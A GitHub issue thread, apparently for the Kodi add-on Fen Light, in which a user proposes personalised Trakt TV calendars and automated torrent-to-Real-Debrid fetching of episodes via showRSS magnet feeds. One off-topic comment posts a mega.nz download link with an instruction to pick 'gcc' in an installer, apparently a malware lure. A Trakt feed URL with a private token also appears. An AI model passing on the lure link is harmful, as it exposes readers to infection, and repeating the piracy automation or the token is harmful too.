### ISSUE TITLE
[Feature Request] My TV Shows Calendar

### ISSUE THREAD

**Issue by hcgiub001** [Tikipeter/tikipeter.github.io#100]
(this is just me getting an idea out, no pressure or anything)
I figure out how Trakt calendars work, Trakt has 5 caleders 

- TV Shows, 
- premieres (episode 1 for any season), 
- new shows (episode 1 for season 1), 
- all movies, 
- DVD & Blu-ray

and each person has 5 personal calendars.Your personal calendars use a combination of anything you’ve watched, collected, or added to your watchlist

I thought Fenlight is using the All TV-shows but I'm not sure.

This feature I've not seen anyone talk about. we can add shows to trakt in our watchlist and each day you got a personalised watchlist of movies/shows you can watch. It's way more personalised and something missing on Kodi.

Not many are aware but TMDBhelper already has this, it's using 3 for all and 3 for personal lists
![Screenshot (462)](https://github.com/user-attachments/assets/4de73ac8-3f40-4263-917e-fc54c4ace88f)

The feature I like the most is "Your TV shows Calendar"
when I click inside I get 
![Screenshot (463)](https://github.com/user-attachments/assets/8b5b96fe-69a5-4dcc-8865-b7d12a5bc5b2)

so I can go to today and see what shows I'm going to watch. I don't need to go hunt for the show or go through picking a show, then the season then find the episode.

this is cool!
Please can we have this added some time you are free (even if it's months from now)? 
so add the other calendar options like TMDBhelper has
 I think this feature could be a killer feature, and I want to make a video about it , bet stremio doesn't have this!

I just wanted to get this idea of my chest. really think it is a feature that people didn't know they wanted and when they have it they can't be without it.

Thanks for your consideration and hope your well

EDIT: the personalised list are all the episodes that aired that day. so now kodi is like NETFLIX where it shows you the shows you watching that day

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by hcgiub001** [comment]
so I've had this idea for a while, if you decide to add this feature. we basically only have to add the shows we want to trakt wishlist (or collections) and we'll a daily calendar of shows that we are watching, this itself isn't something I see anyone talk about BUT I want to extend this and I know of a way.

I learnt about RSS feeds and this website 
https://showrss.info/

not sure if you heard of this but you just put in your shows and it gives you a calendar of what episodes are coming out each day

![Screenshot (493)](https://github.com/user-attachments/assets/d3c47917-f1f5-4a3e-9886-f82e3db09ed1)

the feed is for magnet links, so as soon as a torrent is listed the feed will get updated
![Screenshot (494)](https://github.com/user-attachments/assets/b9fa4586-6316-4b08-8471-d93d7855f950)

https://showrss.info/user/284240.rss?magnets=true&namespaces=true&name=null&quality=null&re=null

so now I need a way to get kodi to read the feeds and send them to Real debrid.
I came across realizer addon that had this functionality but was abandoned, 
henryjfry (thenewdiamond mod) forked it but functionality wasn't working  .

After enquiring he told me he's added that functionality to diamond_info!

![Screenshot (495)](https://github.com/user-attachments/assets/e9bb561e-43cc-4b27-a7b7-8fd7493d069c)

"It syncs the rss feeds you setup for every item not already added to the rss cache within the last 30 days. And it runs at startup and every 8 hours or whatever the setting "Library Sync Period (hours - default = 8)" under "Trakt Collection Library Options" is set to.

And yes it adds the items on an rss feed to RD. Which I know works with showrss.info"

so I've set it that it will scan every hour to see if their is anything new to be added.
their was a problem because Real-debrid only accepts magents this way.
but after asking copilot you can manually convert a torrent link to a magnet with the informaiton provided in the site I use nyaa.si

so now we will get a feed from trakt of all the shows episode for that day.
then we add the same shows in showrss and we have the shows added to our RD account, but why did we need the last part? 

so I was thinking diamond-info must be checking if the file we want is on RD, if not it will download it. as soon as it sends the file to RD, Fenlight could have a popup to say what if anything is added after it has sent the link to RD. because so many people will be using showrss this way. I would say the torrent would take less than a minute to download.
Another way to remind without popups is to have a number after the widget for

my tv show

so we have like

<img width="1280" alt="hihihi" src="https://github.com/user-attachments/assets/02475be1-24df-4ded-89f3-540e17914704">

all this is basically a personalised feed + reminder and indicator of your show being added. we don't need to type in the show, go to series and find the episode and then do a full search.

we'll have a calendar with timings of when the show is going to come on
![Screenshot (497)](https://github.com/user-attachments/assets/54aa9592-c2cc-4dcf-b2fd-0482c37ea5fd)

then we'll have a ping to tell us exactly when it's added so we don't even have to keep checking! and we can click on the episode, it searches cloud so it's super fast and we play it!

this is literally a replacement for Netflix! a personalised feed and reminder! 
I asked henryjfry if I could make a post about dimaond_info RSS feed (+showrss)
but he asked me he rather not so I respected his wish but I really think this is the future of kodi, everyone would be using this and all addons will have to implement something like this. so can you add the RSS feed functionality inside Fenlight.

what do you think Peter?

**Comment by hcgiub001** [comment]
the original realizer addon had more functionality than what henryjfry added
here is a video of how the addon went
https://www.youtube.com/watch?v=9vUlEmcc87U

seems people have forgotten about feeds like this

**Comment by hcgiub001** [comment]
I had ideas on how to extend this feature that would be so amazing and kept it since didn't want to overburden you but I'm putting them down here

So VIP members can create unlimited custom calendars 
all you do is find a list you like and you'll have a button next to it that says custom calendar
so you can have a joint calendar with your partner and then have individual custom calendars to show your own series and it displays on the side like this
![image](https://github.com/user-attachments/assets/ef37bbb4-38f0-4d9e-b65c-c6b86e5bafc8)

out of everything I've asked I don't think anything comes close to this functionality.
I'd expect more people willing to pay for VIP to have these custom calendars

it gets better
each custom calendar has an RSS feed, this is one of mine
https://trakt.tv/calendars/subscriptions/20856.atom?slurm=86cec7a7fe666d5d5d92a280ad6c4382   

I can create a list of all anime that is airing this season then add that list as a custom calendar, now I have a list that shows me all the anime that is airing that day and past days and future (like TMDBhelper can do)
Then I can share my custom calendar for those that don't have VIP and they now have a custom calendar
I can create one for all the latest kdramas and BOOM

This really takes Kodi to the next level as Netflix replacement. everything else like widgets, is just tweaking, this is completely new functionality.
:)

**Comment by hcgiub001** [comment]
Hey Peter, it's strange how things align. I came here to say I think this request is not needed and you add an enhancement. In Fen Light Trakt Calendar , it's not looking at everything in the watchlist, like I thought it would. I mean if I go into my tv show calendar it's not the same. Is that what it's supposed to be doing?

I think messing around with RSS feed is not needed. One thing I like to ask is how does discovery search work? is it the same as searching in TMDB?
I'm trying to create a list that has animation as genre and language as Chinese using discovery but It's not the same as TMDB search.
But I don't see to much value in having lots of calendars for users and it's asking to much from you to implement this.
so if possible I would like to withdraw this and focus on learning how the discovery works and how you created the anime lists, can we do something similar to create a chinese animation list?

**Comment by hcgiub001** [comment]
I'm closing this, the rules are one request at a time and I've used my request up. You have too much on your hands with the limited time you have. I appreciate you considering this though :)

**Comment by hcgiub001** [comment]
erm I'm curious what you would have done..

**Comment by hcgiub001** [comment]
I found something that is even better, working out the details and will come with proposal, it takes what you did and I tweaked it
